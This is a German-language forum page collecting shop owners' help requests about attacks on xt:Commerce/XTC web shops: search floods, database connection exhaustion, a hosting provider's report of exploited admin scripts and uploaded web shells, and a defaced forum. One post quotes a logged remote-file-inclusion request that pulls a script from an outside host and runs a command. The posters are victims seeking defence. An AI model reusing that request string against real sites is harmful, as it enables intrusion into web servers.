Search the Community

Hallo liebe Community, habe seltsame Attacken auf einen XTC 5.0.7-Shop: Seit Tagen werden mehrere 1000 Suchanfragen täglich registriert, die immer ein 13-stelliges numerisches Keyword abfragen ( Pseudo-EAN-Nummern ), das geht auch eindeutig aus dem Access-Log des Servers hervor ( jedesmal eine andere IP-Adresse ! ). Die pumpen natürlich auch den Tab "Shop-Suche" im Backend voll. Ich lösche die halt regelmässig per Skript. Das Plugin "xt_customers_online" zeigt mir beim gleichen Kunden mehr oder weniger konstant um die 1000-2500 Besucher an. In der entsprechenden Tabelle sind auch entsprechend viele Session-IDs verzeichnet. Das Problem ist, dass dadurch mehrmals täglich der SQL-Server schlappmacht ( "too many user connections" ), was dem Umsatz auch nicht gut tut. ( Das mit den "too many user connections" habe ich komischerweise bei den unterschiedlichsten Kunden und sogar auf meiner lokalen Entwicklungsumgebung ( MAMP ), dort hängt sich der mysqli ab und an schon beim Laden des Backends auf ) Irgendwelche Ideen ? Grüsse

Wir brauchen Hilfe wegen einem Hacker Angriff. Wir Zahlen natürlich auch dafür. 3.0.4 SP2.1

Hallo, es wurde meine v3.0.4 SP2.1 gehackt - wer kann dabei helfen die Lücke zu schliessen? Folgende Info kam von unserem Host: Sie erhalten in dieser E-Mail eine Analyse des Angriffs und Hinweise, wie Sie die Sicherheit Ihrer Webseiten wiederherstellen. 1 Analyse des Angriffs 1.1 Ihre folgende Datei hat den Angreifern als Einfallstor gedient: ./admin/categories.php ./admin/configuration.php ./admin/manufacturers.php 1.2 Über dieses Einfallstor ist es den Angreifern gelungen die folgenden schädlichen Dateien auf Ihren Webspace zu laden: ./images/manufacturers/adm.php ./images/manufacturers/mp3.php ./images/manufacturers/logs.php 1.3 Um weitere Angriffe zu verhindern, haben wir alle oben genannten Dateien deaktiviert. Bitte beachten Sie, dass dadurch Teile Ihrer Webpräsenz beeinträchtigt sein können. 1.4 Im Anschluss an diese Nachricht entsperren wir Ihren 1&1 Webspace. Diese Sperre war zum Schutz unserer Infrastruktur notwendig, bitte haben Sie dafür Verständnis. 2 Hinweise zur Absicherung Um die Sicherheit Ihrer Webseiten wiederherzustellen, gehen Sie nun wie folgt vor: 2.1 Löschen Sie die oben genannten Dateien. Unserer Erfahrung nach werden die Angreifer diese Dateien sehr schnell wieder aufsuchen. 2.2 Die folgenden Skripte weisen Sicherheitslücken an den angegebenen Variablen auf. Schließen Sie diese Sicherheitslücken bitte. ./admin/categories.php ./admin/configuration.php ./admin/manufacturers.php Hilfe - was genau tun bzw. wie die Lücke schliessen? Danke & Gruss e

Moin ich hab seit ein paar Tagen immer mal wieder Probleme mit meinem Shop. Irgendwie scheint es möglich zu sein über die Session Tabelle in der Datenbank Schadsoftware einzuschleußen. Kann man das irgendwie unterbinden?

Kann mir mal bitte jemand verraten, was der da versucht hat? Der is grad die ganze Zeit dabei und versucht ständig was anderes.

Seit einiger Zeit habe ich unter "Wer ist Online" immer eine komische IP Adressen: Z.B: 200.163.252.11 http://www.muskelfood.de/index.php?manu=http://canaldrop.by.ru/cmd/tool25.txt?&cmd=id Weiß jemand was das zu bedeuten hat? Mache mir da einige Sorgen zwecks Angriff usw. Wäre über Hilfe dankbar! Gruß Mario

Hallo zusammen... Hab da einen Kunden in der "who is online" Option, der sich seit 7 Stunden ca. alle 6 Minuten einen Artikel in den Warenkorb legt. Kommt mir etwas komisch vor, da jeweils nur 1 Artikel, egal ob einzel- doppel- oder 4er Packung. Könnte es sich dabei um ein script handeln? Was könnte dieses Script erreichen, ausser das der Warenkorb irgendwann einmal extrem voll ist;) Gibt es da eine Möglichkeit den Shop zu "überlasten" oder irgendwie den Server zum absturz zu bringen? Danke für die Antworten

Liebe Community, unser Forum - phpbb2- wurde von Hackern aufgesucht und dort wurden alle index.php und .html gegen andere ausgetauscht, auch die Passw?rter wurden ver?ndert, so dass ich nicht einmal mehr hineinkonnte und den ganzen Mist noch einmal installieren mu?te. Weiss jemand, ob dies auch so leicht beim xtc-Shop vers 3.04. sp1 m?glich ist ? Was kann man dagegen tun, au?er die backups noch woanders, als am Server zu speichern, um Datenverlust zu vermeiden ? Was muss ich von meinem Provider verlangen, dass so etwas nicht ohne weiters passieren kann ? Das hacken scheint noch ein gro?es Problem mit OS-Software zu sein, oder liege ich da falsch ? Was ist die Empfehlung von den Profis ? F?r n?tzliche Tipps w?re ich sehr dankbar. LG Conny